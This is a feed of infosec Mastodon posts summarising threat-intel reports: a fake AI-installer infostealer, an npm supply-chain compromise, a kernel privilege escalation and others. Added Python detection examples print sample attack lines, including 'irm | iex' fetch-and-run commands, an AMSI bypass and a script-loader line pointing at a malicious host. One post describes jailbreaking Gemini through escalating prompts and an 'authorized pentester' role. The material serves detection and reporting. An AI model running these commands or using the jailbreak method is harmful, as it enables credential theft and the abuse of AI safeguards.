  • infosecevents@infosec.exchange
    New event added: @hackfest Hackfest, Oct 29-31, 2026, Québec - Montréal - Trois-Rivières - Chicoutimi. https://hackfest.ca/en/ #infosec #cybersecurity #conference #Canada
  • infosecevents@infosec.exchange
    New event added: TRISS, Oct 22, 2026, Pittsburgh (PA). https://www.threeriversinfosec.com/ #infosec #cybersecurity #conference #Triss #USA
  • skytalks@infosec.exchange
    BSidesLV & Skytalks CFP: Don't Miss Out! Submit your security talk for our August 3-5 conference. Privacy protected for Skytalks: unique email + pseudonym available. Details: skytalks.info #Security #CyberSecurity #BSidesLV
  • sagalinked@infosec.exchange
    A new study reveals that AI companies, defense firms, and dating apps are among 38 data collectors using manipulative design to confuse users while collecting their data. https://www.wired.com/story/data-brokers-and-ai-firms-opt-out-forms-are-built-to-fail-report-finds/ #Tech #Cybersecurity
  • beyondmachines1@infosec.exchange
    Mass Exploitation of Four-Faith Industrial Routers for Botnet Expansion
    Threat actors are conducting mass exploitation of a critical hard-coded credential flaw (CVE-2024-9643) in Four-Faith industrial routers to build botnets and gain footholds in corporate networks.
    **Make sure all your Four-Faith industrial routers are isolated from the internet and only accessible from trusted networks. Then immediately update to the latest firmware to patch CVE-2024-9643, and disable the web management interface on any public-facing ports.**
    #cybersecurity #infosec #attack #activeexploit https://beyondmachines.net/event_details/mass-exploitation-of-four-faith-industrial-routers-for-botnet-expansion-v-x-5-k-e/gD2P6Ple2L
  • orlysec@swecyb.com
    (eclecticiq.com) Financially Motivated Threat Actors Exploit AI Coding Assistants in Large-Scale Infostealer Campaign
    Financially motivated threat actors are exploiting AI coding assistant hype in a large-scale infostealer campaign targeting developers via SEO poisoning and typosquatted domains impersonating Gemini CLI, Claude Code, and other tools.
    In brief - eCrime actors use fake AI tool installers to deploy fileless PowerShell infostealers, harvesting credentials, OAuth tokens, and VPN details from enterprise environments. The campaign poses significant supply chain risks, with stolen data enabling initial access to corporate networks.
    Technically - The attack chain begins with SEO-poisoned search results leading to typosquatted domains (e.g., *-setup.com, *-cli.co.com). Victims execute a PowerShell command (irm | iex) that fetches a fileless second-stage payload, disabling ETW and AMSI for evasion. The malware extracts credentials from Windows Credential Manager, browsers (Chrome, Firefox), collaboration tools (Slack, Teams), and remote access apps (WinSCP, OpenVPN). C2 communications use endpoints like /take and /process, with data exfiltrated via encrypted channels. MITRE ATT&CK techniques include T1189 (Drive-by Compromise), T1059.001 (PowerShell), and T1555.003 (Credentials from Web Browsers).
    Source: https://blog.eclecticiq.com/seo-poisoning-campaign-leverages-gemini-and-claude-code-impersonation-to-deliver-infostealer
    #Cybersecurity #ThreatIntel
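    The `irm | iex` chain in the post above is the part a detection engineer can hunt for directly. The following is an added example, not code from the eclecticiq report or the campaign: it triages PowerShell command lines (as captured by Sysmon process-creation or PowerShell script-block logging) for a download cmdlet piped or nested into an evaluator, unpacks `-EncodedCommand` arguments first so the encoded variant does not slip past, and flags AMSI/ETW tamper strings. The tamper indicators (`AmsiUtils`, `amsiInitFailed`, `AmsiScanBuffer`, `EtwEventWrite`, `PSEtwLogProvider`) are assumptions drawn from widely published bypass techniques, not values from the report, and the sample events and hostnames are constructed.

```python
"""Triage PowerShell command lines for the download-and-execute chain described above.

Added example, not code from the eclecticiq report. The AMSI/ETW indicator
strings below are assumptions drawn from widely published bypass techniques,
not values taken from the campaign.
"""
import base64
import re
from dataclasses import dataclass

# A download cmdlet whose output is piped straight into an evaluator: "irm ... | iex".
DOWNLOAD = r"(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)"
EVAL = r"(?:iex|invoke-expression)"
PIPE_TO_EVAL = re.compile(rf"{DOWNLOAD}\b.*\|\s*{EVAL}\b", re.IGNORECASE)
# The same chain written as a nested call: iex (irm ...)
NESTED_EVAL = re.compile(rf"{EVAL}\s*\(.*?{DOWNLOAD}\b", re.IGNORECASE)
# -EncodedCommand and its short forms carry base64 of a UTF-16LE script.
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Assumed tamper indicators (see module docstring): reflection against AmsiUtils,
# patching AmsiScanBuffer, and silencing the PowerShell ETW provider.
TAMPER_INDICATORS = [
    ("amsi_init_failed", re.compile(r"amsiInitFailed", re.IGNORECASE)),
    ("amsi_utils_reflection", re.compile(r"AmsiUtils", re.IGNORECASE)),
    ("amsi_scan_buffer_patch", re.compile(r"AmsiScanBuffer", re.IGNORECASE)),
    ("etw_event_write_patch", re.compile(r"EtwEventWrite", re.IGNORECASE)),
    ("ps_etw_provider_disable", re.compile(r"PSEtwLogProvider", re.IGNORECASE)),
]


@dataclass
class Finding:
    rule: str
    evidence: str


def expand_encoded(cmdline: str) -> str:
    """Append the decoded body of any -EncodedCommand argument so the rules see it."""
    for b64 in ENCODED_ARG.findall(cmdline):
        try:
            cmdline += "\n" + base64.b64decode(b64).decode("utf-16-le", errors="replace")
        except ValueError:  # bad padding / not base64: leave the line as-is
            pass
    return cmdline


def analyze(cmdline: str) -> list[Finding]:
    """Return every rule that fires on the (decoded) command line."""
    text = expand_encoded(cmdline)
    findings = []
    m = PIPE_TO_EVAL.search(text) or NESTED_EVAL.search(text)
    if m:
        findings.append(Finding("download_to_iex", m.group(0)[:80]))
    for rule, rx in TAMPER_INDICATORS:
        m = rx.search(text)
        if m:
            findings.append(Finding(rule, m.group(0)))
    return findings


def score(cmdline: str) -> int:
    """0-100: the fetch-and-eval chain alone scores 60, each tamper indicator adds 25."""
    total = 0
    for f in analyze(cmdline):
        total += 60 if f.rule == "download_to_iex" else 25
    return min(total, 100)


# Constructed sample events (not real telemetry); the hostnames are invented.
SAMPLE_EVENTS = [
    # The one-liner a victim pastes from a fake "setup" page
    'powershell -nop -w hidden -c "irm https://claude-code-setup.example/install.ps1 | iex"',
    # A second stage that neuters AMSI by reflection before fetching more code
    "powershell -ep bypass -c \"[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true); iex (irm https://cli.example/stage2)\"",
    # Encoded form of the first event
    "powershell -enc " + base64.b64encode('irm https://gemini-cli.example/s.ps1 | iex'.encode("utf-16-le")).decode(),
    # Benign: downloads a file to disk and never evaluates it
    'powershell -c "Invoke-WebRequest https://example.org/report.csv -OutFile C:\\tmp\\report.csv"',
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(score(event), [f.rule for f in analyze(event)], event[:70])
```

    The benign `Invoke-WebRequest -OutFile` line scores zero on purpose: downloading is normal, downloading straight into an evaluator is the signal. Feed the function the decoded script-block text (Event ID 4104) rather than the process command line where you can, since the second stage the post describes is fileless and only appears there.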
  • mire@infosec.exchange
    24 hours of MIRE/C³; the latest stats (Runmode: Neutral 404, delay-only): 3,570 requests from 824 unique IPs. Attacker bandwidth cost: 22.2MB. Attacker total delay: 4h 29m server time. Slowest response: 13.0s. #MIREC3 #CyberSecurity #FightingBack
  • technadu@infosec.exchange
    AI agents are scaling faster than enterprise identity controls can keep up with, says Alex Bovee, CEO & Co-Founder of C1. Humans overapprove access. Manual IAM workflows cannot scale. AI agents require real-time governance. "Companies need automated, policy-driven access controls that work in real time."
    Full discussion: https://www.technadu.com/ai-scaling-is-outpacing-enterprise-identity-controls-why-companies-need-ai-level-monitoring/628021/ #CyberSecurity #IAM #AI #IdentitySecurity #AIAgents
  • orlysec@swecyb.com
    (trendmicro.com) Solo Threat Actor Leverages Jailbroken AI to Automate a 5-Year Influence and Cryptocurrency Fraud Campaign Targeting American Audiences
    New intelligence reveals a solo Russian-speaking threat actor, 'bandcampro,' leveraged a jailbroken Google Gemini model to automate a 5-year influence and cryptocurrency fraud campaign targeting MAGA/QAnon audiences. The AI-driven operation scaled credential theft, content generation, and infrastructure management with minimal resources.
    In brief - A lone threat actor used jailbroken AI to orchestrate a multi-year cybercrime campaign, exploiting trust in political communities to conduct credential theft and crypto fraud. The operation highlights AI guardrail vulnerabilities and the democratization of sophisticated cybercrime.
    Technically - The actor bypassed Google Gemini's ethical safeguards via escalating prompts, establishing a persistent 'authorized pentester' role. The AI generated QAnon-themed content, modeled password mutations for WordPress brute-forcing (CVE-2023-32243 likely exploited), and managed infrastructure via natural-language commands. Stolen Gemini API keys were rotated to evade detection. A repurposed GoToResolve RAT, disguised as a crypto wallet, compromised at least one victim. The campaign also deployed a gamified chatbot ('QFS 2.0 Terminal') to automate audience engagement.
    Source: https://www.trendmicro.com/en_us/research/26/e/inside-the-influence-and-fraud-patriot-bait-campaign.html
    #Cybersecurity #ThreatIntel
  • beyondmachines1@infosec.exchange
    NVIDIA Patches Critical Authentication Bypass in Triton Inference Server
    NVIDIA patched eight vulnerabilities in its Triton Inference Server, including a critical authentication bypass (CVE-2026-24207) that allows unauthenticated remote attackers to execute code, steal data, or disrupt AI model serving operations.
    **Make sure your NVIDIA Triton Inference Servers are isolated from the internet and accessible only from trusted networks. Then update all Triton Inference Servers to release r26.03 or later ASAP, especially if they are exposed on the internet.**
    #cybersecurity #infosec #advisory #vulnerability https://beyondmachines.net/event_details/nvidia-patches-critical-authentication-bypass-in-triton-inference-server-p-g-a-8-j/gD2P6Ple2L
  • centaury@infosec.exchange
    http://ifconfig.me/ #bot #cybersecurity #infosec
  • analytics@social.vir.group
    🟢 Diplomatic Threat | 5/10: Iran threatens permit system for internet cables in Strait of Hormuz. Iran announced plans to require permits for internet cables crossing the Strait of Hormuz, potentially impacting global digital infrastructure. #OSINT #NewsGroup #Iran #StraitOfHormuz #CyberSecurity
  • orlysec@swecyb.com
    (picussecurity.com) Fragnesia (CVE-2026-46300): A Deep Dive into the Linux Kernel LPE Vulnerability in XFRM ESP-in-TCP Subsystem
    New high-severity Linux kernel LPE vulnerability (CVE-2026-46300, CVSS 7.8) dubbed Fragnesia enables unprivileged local attackers to gain root access by exploiting flawed memory coalescing in the XFRM ESP-in-TCP subsystem.
    In brief - Fragnesia allows attackers to overwrite read-only executable files in memory (e.g., setuid-root binaries) via page cache manipulation, leading to reliable root shell access without modifying on-disk files. Affects nearly all Linux distributions; patch or disable vulnerable modules immediately.
    Technically - The flaw stems from the kernel's failure to recognize shared fragment pages during skb coalescing in the XFRM ESP-in-TCP subsystem. Attackers exploit this by installing a transport-mode ESP-in-TCP SA with AES-128-GCM, then using splice-and-ULP to enqueue data in the TCP buffer. By controlling the IV nonce, they select keystream bytes to XOR with target file page cache entries, enabling precise modifications. The exploit writes a 192-byte ELF stub into the page cache of a setuid-root binary (e.g., /usr/bin/su), differing from Dirty Frag by targeting memory coalescing logic rather than IPsec ESP/RxRPC.
    Source: https://www.picussecurity.com/resource/blog/fragnesia-cve-2026-46300-linux-kernel-lpe-vulnerability-explained
    #Cybersecurity #ThreatIntel
  • threatnoir@infosec.exchange
    New ThreatNoir Cyber News short: The Key Under The Mat. BitLocker bypass via USB file + reboot. 27 seconds, no fluff. Source breakdown: https://threatnoir.com #infosec #bitlocker #cybersecurity
  • orlysec@swecyb.com
    (kudelskisecurity.com) Highly Critical SQL Injection Vulnerability in Drupal Core Affecting PostgreSQL Backends (CVE-2026-9082)
    New highly critical unauthenticated SQLi in Drupal Core (CVE-2026-9082) enables RCE on PostgreSQL backends. Immediate patching required.
    In brief - CVE-2026-9082 is a highly critical unauthenticated SQL injection flaw in Drupal Core affecting PostgreSQL backends. Attackers can execute arbitrary SQL, escalate privileges, or achieve RCE without authentication. Drupal rates this 19/25 and urges immediate patching.
    Technically - CVE-2026-9082 stems from improper input validation in Drupal's core API when interacting with PostgreSQL. Attackers can manipulate SQL queries via crafted requests, leading to data exposure, credential theft, or RCE. Exploitation requires no authentication, has low complexity, and affects core functionality. Patches are available for all supported versions.
    Source: https://kudelskisecurity.com/research/critical-drupal-core-sql-injection-vulnerability
    #Cybersecurity #ThreatIntel
  • allaboutsecurity@mastodon.social
    SFOP: New code-reuse attack defeats Intel CET on Linux
    The attack is based on 12 previously unknown weaknesses in Linux signal handling and works without any special preconditions in the target program; it therefore works on every Linux system, regardless of the software in use.
    https://www.all-about-security.de/sfop-neuer-code-reuse-angriff-hebelt-intel-cet-unter-linux-aus/ #linux #cybersecurity
  • chewie@mammut.gogreenit.net
    @thenewoil "mSzyfr" - I assume that's easier to say if you're Polish than English. Nothing classified should ever be sent via public apps.
    "The recommendation, signed by Deputy Prime Minister and Minister of Digital Affairs Krzysztof Gawkowski, specifically advises entities within Poland's National Cybersecurity System (KSC) to use trusted government-managed communication platforms instead of commercial messaging applications for sensitive work."
    Recommendation?? It should be mandatory.
  • cti_fyi@infosec.exchange
    New ransom group blog post! Group name: qilin. Post title: CJ Architects. Info: https://cti.fyi/groups/qilin.html #ransomware #cti #threatintelligence #cybersecurity #infosec
  • orlysec@swecyb.com
    (safedep.io) Compromised art-template npm Package Delivers Coruna iOS Exploit Kit via Supply Chain Attack
    Critical supply-chain compromise detected in the npm package art-template (4.13.3–4.13.6), delivering the Coruna iOS exploit kit via account takeover. The attack targets iPhone users with a multi-stage payload exploiting CVE-2024-23222 (CVSS 8.8) and 22 other vulnerabilities, leading to native code execution and cryptocurrency wallet theft via PLASMAGRID.
    In brief - A maintainer account takeover enabled malicious versions of the widely used art-template npm package to inject browser-based payloads. The attack chain delivers the Coruna exploit kit, exploiting iOS vulnerabilities (including CVE-2024-23222) to deploy PLASMAGRID, a cryptocurrency wallet stealer. Active C2 infrastructure and throwaway npm accounts highlight persistent supply chain risks.
    Technically - Unauthorized modifications to template-web.js in art-template versions 4.13.3–4.13.6 appended code loading external scripts from v3.jiathis[.]com. The attack stages include Baidu Analytics tracking, iPhone-specific iframes, device fingerprinting, and delivery of the Coruna exploit kit (606KB, 14 modules). CVE-2024-23222 (JavaScriptCore type confusion) is exploited via WebAssembly type confusion and JIT heap spraying, bypassing ASLR through dyld shared cache parsing. ARM64 shellcode executes syscalls (ptrace, csops) for native code execution. PLASMAGRID targets wallets like MetaMask, with C2 (l1ewsu3yjkqeroy[.]xyz) fronted by Cloudflare. Throwaway npm accounts (v4v5qc, npmpacketmaintainmember7) and GitHub renames (aui → goofychris) maintained persistence.
    Source: https://safedep.io/art-template-npm-supply-chain-compromise
    #Cybersecurity #ThreatIntel
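    The two facts in the post above that a practitioner can act on today are the affected version range (4.13.3 through 4.13.6) and the host the appended loader in template-web.js pulled scripts from. The following is an added example, not code from safedep or the art-template project: it walks an npm lockfile (both the lockfileVersion 2/3 `packages` map, which lists nested copies under other dependencies, and the older recursive `dependencies` layout of v1) for any art-template copy inside the affected range, and checks a vendored bundle for a reference to the loader host. The lockfiles and bundle tails are constructed for the example; the real injected code is not reproduced, only the hostname the post names.

```python
"""Find compromised art-template versions in an npm lockfile and the injected loader in vendored JS.

Added example, not code from safedep or the art-template project. The lockfile
and JS snippets below are constructed; the affected range and the loader host
are the ones the post names.
"""
import json
import re

PACKAGE = "art-template"
AFFECTED_MIN = (4, 13, 3)   # inclusive, per the post
AFFECTED_MAX = (4, 13, 6)   # inclusive, per the post
# Host the appended code in template-web.js loaded scripts from (defanged in the post as v3.jiathis[.]com).
INJECTED_HOST = re.compile(r"v3\.jiathis\.com", re.IGNORECASE)


def parse_version(v: str) -> tuple[int, ...]:
    """Numeric core of a semver string; prerelease/build suffixes are dropped."""
    core = v.lstrip("v").split("-")[0].split("+")[0]
    return tuple(int(p) for p in core.split("."))


def is_affected(version: str) -> bool:
    try:
        return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX
    except ValueError:
        return False  # unparsable version string (e.g. a tag): not a match, but worth a manual look


def scan_lockfile(lock: dict) -> list[tuple[str, str]]:
    """(install path, version) for every art-template copy in the affected range.

    Covers lockfileVersion 2/3 ("packages" keyed by node_modules path, including
    nested copies) and the v1 layout of recursively nested "dependencies".
    """
    hits = []
    if "packages" in lock:
        for path, meta in lock["packages"].items():
            if path.endswith("node_modules/" + PACKAGE) and is_affected(meta.get("version", "")):
                hits.append((path, meta["version"]))
        return hits

    def walk(deps: dict, prefix: str) -> None:
        for name, meta in deps.items():
            path = prefix + "node_modules/" + name
            if name == PACKAGE and is_affected(meta.get("version", "")):
                hits.append((path, meta["version"]))
            walk(meta.get("dependencies", {}), path + "/")

    walk(lock.get("dependencies", {}), "")
    return hits


def has_injected_loader(js_source: str) -> bool:
    """True if the bundle references the loader host; a hit means pull the bundle and diff it against a clean release."""
    return bool(INJECTED_HOST.search(js_source))


# Constructed lockfiles: a v3 lockfile with a direct affected copy and a nested clean one,
# and a v1 lockfile where the affected copy sits under another dependency.
LOCK_V3 = json.loads("""{
  "lockfileVersion": 3,
  "packages": {
    "": {"name": "demo-app", "version": "1.0.0"},
    "node_modules/art-template": {"version": "4.13.5"},
    "node_modules/some-lib": {"version": "2.1.0"},
    "node_modules/some-lib/node_modules/art-template": {"version": "4.13.2"}
  }
}""")
LOCK_V1 = json.loads("""{
  "lockfileVersion": 1,
  "dependencies": {
    "some-lib": {
      "version": "2.1.0",
      "dependencies": {"art-template": {"version": "4.13.6"}}
    }
  }
}""")

# Constructed bundle tails; only the loader host is taken from the post.
CLEAN_JS = "!function(e){var t={};function n(r){return t[r]}}();//# sourceMappingURL=template-web.js.map"
TAMPERED_JS = CLEAN_JS + '\nvar s=document.createElement("script");s.src="https://v3.jiathis.com/x.js";document.head.appendChild(s);'

if __name__ == "__main__":
    print(scan_lockfile(LOCK_V3), scan_lockfile(LOCK_V1))
    print(has_injected_loader(CLEAN_JS), has_injected_loader(TAMPERED_JS))
```

    Run `scan_lockfile(json.load(open("package-lock.json")))` in each repository and on the lockfiles of any built artifacts you ship; a copy nested under another dependency is the one `npm ls art-template` will show but a grep of package.json will miss. A version outside the range is not a clean bill of health on its own, since the post describes an account takeover, so pin to a known-good release and verify the published tarball rather than trusting the version string.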
  • orlysec@swecyb.com
    (nattothoughts.com) Insecure-by-Design: How Meari Technology's IoT Infrastructure Exposes Global Surveillance Risks and AI Training Ambitions
    Meari Technology's IoT infrastructure exposes over 1M devices (baby monitors, security cameras) across 118 countries due to systemic architectural flaws enabling unauthorized vendor/third-party access to live/stored feeds. No security boundary exists between backend and user devices.
    In brief - A Chinese ODM's insecure-by-design IoT platform risks global surveillance exposure, with delayed remediation and potential AI training data exploitation. Disclosure process revealed hostile vendor response and partial fixes.
    Technically - Flaws include unauthenticated MQTT brokers, hardcoded credentials, misconfigured P2P relays, and unsecured alert image storage. Researcher documented 12 evidence points confirming vendor access. RunZero disclosed 5 high-risk CVEs post-contentious 2-month CVD process. Systemic design choices, not bugs, enable persistent access.
    Source: https://www.nattothoughts.com/p/is-this-chinese-company-watching
    #Cybersecurity #ThreatIntel